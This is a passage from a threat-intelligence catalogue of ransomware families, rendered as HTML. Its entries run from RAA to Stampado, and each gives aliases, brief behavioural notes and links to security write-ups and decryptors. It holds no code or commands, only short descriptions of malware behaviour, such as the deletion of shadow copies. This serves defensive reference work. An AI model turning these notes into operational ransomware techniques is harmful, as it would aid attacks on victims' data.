<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2075. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/">https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_raa_encryptor"><a class="anchor" href="#_raa_encryptor"></a><a class="link" href="#_raa_encryptor">RAA encryptor</a></h3>
<div class="paragraph">
<p>Ransomware Possible affiliation with Pony</p>
</div>
<div class="paragraph">
<p>RAA encryptor is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RAA</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2076. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://reaqta.com/2016/06/raa-ransomware-delivering-pony/">https://reaqta.com/2016/06/raa-ransomware-delivering-pony/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/the-new-raa-ransomware-is-created-entirely-using-javascript/">http://www.bleepingcomputer.com/news/security/the-new-raa-ransomware-is-created-entirely-using-javascript/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rabion"><a class="anchor" href="#_rabion"></a><a class="link" href="#_rabion">Rabion</a></h3>
<div class="paragraph">
<p>Ransomware RaaS Copy of Ranion RaaS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2077. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/CryptoInsane/status/846181140025282561">https://twitter.com/CryptoInsane/status/846181140025282561</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_radamant"><a class="anchor" href="#_radamant"></a><a class="link" href="#_radamant">Radamant</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2078. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/radamant">https://decrypter.emsisoft.com/radamant</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/new-radamant-ransomware-kit-adds-rdm-extension-to-encrypted-files/">http://www.bleepingcomputer.com/news/security/new-radamant-ransomware-kit-adds-rdm-extension-to-encrypted-files/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/radamant.html">http://www.nyxbone.com/malware/radamant.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rakhni"><a class="anchor" href="#_rakhni"></a><a class="link" href="#_rakhni">Rakhni</a></h3>
<div class="paragraph">
<p>Ransomware Files might be partially encrypted</p>
</div>
<div class="paragraph">
<p>Rakhni is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Agent.iih</p>
</li>
<li>
<p>Aura</p>
</li>
<li>
<p>Autoit</p>
</li>
<li>
<p>Pletor</p>
</li>
<li>
<p>Rotor</p>
</li>
<li>
<p>Lamer</p>
</li>
<li>
<p>Isda</p>
</li>
<li>
<p>Cryptokluchen</p>
</li>
<li>
<p>Bandarchor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2079. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/us/viruses/disinfection/10556">https://support.kaspersky.com/us/viruses/disinfection/10556</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ramsomeer"><a class="anchor" href="#_ramsomeer"></a><a class="link" href="#_ramsomeer">Ramsomeer</a></h3>
<div class="paragraph">
<p>Ransomware Based on the DUMB ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_rannoh"><a class="anchor" href="#_rannoh"></a><a class="link" href="#_rannoh">Rannoh</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2080. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ranran"><a class="anchor" href="#_ranran"></a><a class="link" href="#_ranran">RanRan</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2081. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/pan-unit42/public_tools/tree/master/ranran_decryption">https://github.com/pan-unit42/public_tools/tree/master/ranran_decryption</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/03/unit42-targeted-ransomware-attacks-middle-eastern-government-organizations-political-purposes/">http://researchcenter.paloaltonetworks.com/2017/03/unit42-targeted-ransomware-attacks-middle-eastern-government-organizations-political-purposes/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-ranran-ransomware-uses-encryption-tiers-political-messages/">https://www.bleepingcomputer.com/news/security/new-ranran-ransomware-uses-encryption-tiers-political-messages/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ransoc"><a class="anchor" href="#_ransoc"></a><a class="link" href="#_ransoc">Ransoc</a></h3>
<div class="paragraph">
<p>Ransomware Doesn&#8217;t encrypt user files</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2082. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles">https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/ransoc-ransomware-extorts-users-who-accessed-questionable-content/">https://www.bleepingcomputer.com/news/security/ransoc-ransomware-extorts-users-who-accessed-questionable-content/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ransom32"><a class="anchor" href="#_ransom32"></a><a class="link" href="#_ransom32">Ransom32</a></h3>
<div class="paragraph">
<p>Ransomware no extension change, Javascript Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_ransomlock"><a class="anchor" href="#_ransomlock"></a><a class="link" href="#_ransomlock">RansomLock</a></h3>
<div class="paragraph">
<p>Ransomware Locks the desktop</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2083. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2009-041513-1400-99&amp;tabid=2">https://www.symantec.com/security_response/writeup.jsp?docid=2009-041513-1400-99&amp;tabid=2</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rarvault"><a class="anchor" href="#_rarvault"></a><a class="link" href="#_rarvault">RarVault</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_razy"><a class="anchor" href="#_razy"></a><a class="link" href="#_razy">Razy</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2084. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/Razy(German).html">http://www.nyxbone.com/malware/Razy(German).html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://nyxbone.com/malware/Razy.html">http://nyxbone.com/malware/Razy.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rector"><a class="anchor" href="#_rector"></a><a class="link" href="#_rector">Rector</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2085. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/viruses/disinfection/4264">https://support.kaspersky.com/viruses/disinfection/4264</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rektlocker"><a class="anchor" href="#_rektlocker"></a><a class="link" href="#_rektlocker">RektLocker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2086. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/viruses/disinfection/4264">https://support.kaspersky.com/viruses/disinfection/4264</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remindme"><a class="anchor" href="#_remindme"></a><a class="link" href="#_remindme">RemindMe</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2087. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/RemindMe.html">http://www.nyxbone.com/malware/RemindMe.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://i.imgur.com/gV6i5SN.jpg">http://i.imgur.com/gV6i5SN.jpg</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rokku"><a class="anchor" href="#_rokku"></a><a class="link" href="#_rokku">Rokku</a></h3>
<div class="paragraph">
<p>Ransomware possibly related with Chimera</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2088. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.org/threat-analysis/2016/04/rokku-ransomware/">https://blog.malwarebytes.org/threat-analysis/2016/04/rokku-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_roshalock"><a class="anchor" href="#_roshalock"></a><a class="link" href="#_roshalock">RoshaLock</a></h3>
<div class="paragraph">
<p>Ransomware Stores your files in a password protected RAR file</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2089. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/siri_urz/status/842452104279134209">https://twitter.com/siri_urz/status/842452104279134209</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_runsomewere"><a class="anchor" href="#_runsomewere"></a><a class="link" href="#_runsomewere">Runsomewere</a></h3>
<div class="paragraph">
<p>Ransomware Based on HT/EDA2 Utilizes the Jigsaw Ransomware background</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2090. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/801812325657440256">https://twitter.com/struppigel/status/801812325657440256</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_russianroulette"><a class="anchor" href="#_russianroulette"></a><a class="link" href="#_russianroulette">RussianRoulette</a></h3>
<div class="paragraph">
<p>Ransomware Variant of the Philadelphia ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2091. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/823925410392080385">https://twitter.com/struppigel/status/823925410392080385</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sadstory"><a class="anchor" href="#_sadstory"></a><a class="link" href="#_sadstory">SADStory</a></h3>
<div class="paragraph">
<p>Ransomware Variant of CryPy</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2092. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/845356853039190016">https://twitter.com/malwrhunterteam/status/845356853039190016</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sage_2_2"><a class="anchor" href="#_sage_2_2"></a><a class="link" href="#_sage_2_2">Sage 2.2</a></h3>
<div class="paragraph">
<p>Ransomware Sage 2.2 deletes volume snapshots through vssadmin.exe, disables startup repair, uses process wscript.exe to execute a VBScript, and coordinates the execution of scheduled tasks via schtasks.exe.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2093. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://malwarebreakdown.com/2017/03/16/sage-2-2-ransomware-from-good-man-gate">https://malwarebreakdown.com/2017/03/16/sage-2-2-ransomware-from-good-man-gate</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://malwarebreakdown.com/2017/03/10/finding-a-good-man/">https://malwarebreakdown.com/2017/03/10/finding-a-good-man/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_samas_samsam"><a class="anchor" href="#_samas_samsam"></a><a class="link" href="#_samas_samsam">Samas-Samsam</a></h3>
<div class="paragraph">
<p>Ransomware Targeted attacks -Jexboss -PSExec -Hyena</p>
</div>
<div class="paragraph">
<p>Samas-Samsam is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>samsam.exe</p>
</li>
<li>
<p>MIKOPONI.exe</p>
</li>
<li>
<p>RikiRafael.exe</p>
</li>
<li>
<p>showmehowto.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2094. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://download.bleepingcomputer.com/demonslay335/SamSamStringDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/SamSamStringDecrypter.zip</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintel.com/2016/03/samsam-ransomware.html">http://blog.talosintel.com/2016/03/samsam-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.intelsecurity.com/advanced-threat-research/content/Analysis_SamSa_Ransomware.pdf">http://www.intelsecurity.com/advanced-threat-research/content/Analysis_SamSa_Ransomware.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sanction"><a class="anchor" href="#_sanction"></a><a class="link" href="#_sanction">Sanction</a></h3>
<div class="paragraph">
<p>Ransomware Based on HiddenTear, but heavily modified keygen</p>
</div>
</div>
<div class="sect2">
<h3 id="_sanctions"><a class="anchor" href="#_sanctions"></a><a class="link" href="#_sanctions">Sanctions</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2095. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/sanctions-ransomware-makes-fun-of-usa-sanctions-against-russia/">https://www.bleepingcomputer.com/news/security/sanctions-ransomware-makes-fun-of-usa-sanctions-against-russia/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sardoninir"><a class="anchor" href="#_sardoninir"></a><a class="link" href="#_sardoninir">Sardoninir</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2096. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/835955409953357825">https://twitter.com/BleepinComputer/status/835955409953357825</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_satana"><a class="anchor" href="#_satana"></a><a class="link" href="#_satana">Satana</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2097. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2016/06/satana-ransomware/">https://blog.malwarebytes.com/threat-analysis/2016/06/satana-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.kaspersky.com/satana-ransomware/12558/">https://blog.kaspersky.com/satana-ransomware/12558/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scraper"><a class="anchor" href="#_scraper"></a><a class="link" href="#_scraper">Scraper</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2098. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://securelist.com/blog/research/69481/a-flawed-ransomware-encryptor/">http://securelist.com/blog/research/69481/a-flawed-ransomware-encryptor/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_serpico"><a class="anchor" href="#_serpico"></a><a class="link" href="#_serpico">Serpico</a></h3>
<div class="paragraph">
<p>Ransomware DetoxCrypto Variant</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2099. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/Serpico.html">http://www.nyxbone.com/malware/Serpico.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shark"><a class="anchor" href="#_shark"></a><a class="link" href="#_shark">Shark</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>Shark is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Atom</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2100. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/the-shark-ransomware-project-allows-to-create-your-own-customized-ransomware/">http://www.bleepingcomputer.com/news/security/the-shark-ransomware-project-allows-to-create-your-own-customized-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/shark-ransomware-rebrands-as-atom-for-a-fresh-start/">http://www.bleepingcomputer.com/news/security/shark-ransomware-rebrands-as-atom-for-a-fresh-start/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shinolocker"><a class="anchor" href="#_shinolocker"></a><a class="link" href="#_shinolocker">ShinoLocker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2101. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/760560147131408384">https://twitter.com/JakubKroustek/status/760560147131408384</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/new-educational-shinolocker-ransomware-project-released/">http://www.bleepingcomputer.com/news/security/new-educational-shinolocker-ransomware-project-released/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shujin"><a class="anchor" href="#_shujin"></a><a class="link" href="#_shujin">Shujin</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>Shujin is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>KinCrypt</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2102. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/chineseRansom.html">http://www.nyxbone.com/malware/chineseRansom.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/">http://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_simple_encoder"><a class="anchor" href="#_simple_encoder"></a><a class="link" href="#_simple_encoder">Simple_Encoder</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2103. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/the-shark-ransomware-project-allows-to-create-your-own-customized-ransomware/">http://www.bleepingcomputer.com/news/security/the-shark-ransomware-project-allows-to-create-your-own-customized-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_skidlocker"><a class="anchor" href="#_skidlocker"></a><a class="link" href="#_skidlocker">SkidLocker</a></h3>
<div class="paragraph">
<p>Ransomware Based on EDA2</p>
</div>
<div class="paragraph">
<p>SkidLocker is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Pompous</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2104. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/pompous-ransomware-dev-gets-defeated-by-backdoor/">http://www.bleepingcomputer.com/news/security/pompous-ransomware-dev-gets-defeated-by-backdoor/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/SkidLocker.html">http://www.nyxbone.com/malware/SkidLocker.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smash"><a class="anchor" href="#_smash"></a><a class="link" href="#_smash">Smash!</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2105. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/smash-ransomware-is-cute-rather-than-dangerous/">https://www.bleepingcomputer.com/news/security/smash-ransomware-is-cute-rather-than-dangerous/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smrss32"><a class="anchor" href="#_smrss32"></a><a class="link" href="#_smrss32">Smrss32</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_snslocker"><a class="anchor" href="#_snslocker"></a><a class="link" href="#_snslocker">SNSLocker</a></h3>
<div class="paragraph">
<p>Ransomware Based on EDA2</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2106. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://nyxbone.com/malware/SNSLocker.html">http://nyxbone.com/malware/SNSLocker.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://nyxbone.com/images/articulos/malware/snslocker/16.png">http://nyxbone.com/images/articulos/malware/snslocker/16.png</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sport"><a class="anchor" href="#_sport"></a><a class="link" href="#_sport">Sport</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_stampado"><a class="anchor" href="#_stampado"></a><a class="link" href="#_stampado">Stampado</a></h3>
<div class="paragraph">
<p>Ransomware Coded by "The_Rainmaker" Randomly deletes a file every 6hrs up to 96hrs then deletes decryption key</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2107. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221">https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/">http://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/stampado">https://decrypter.emsisoft.com/stampado</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://cdn.streamable.com/video/mp4/kfh3.mp4">https://cdn.streamable.com/video/mp4/kfh3.mp4</a></p></td>
</tr>
<tr>
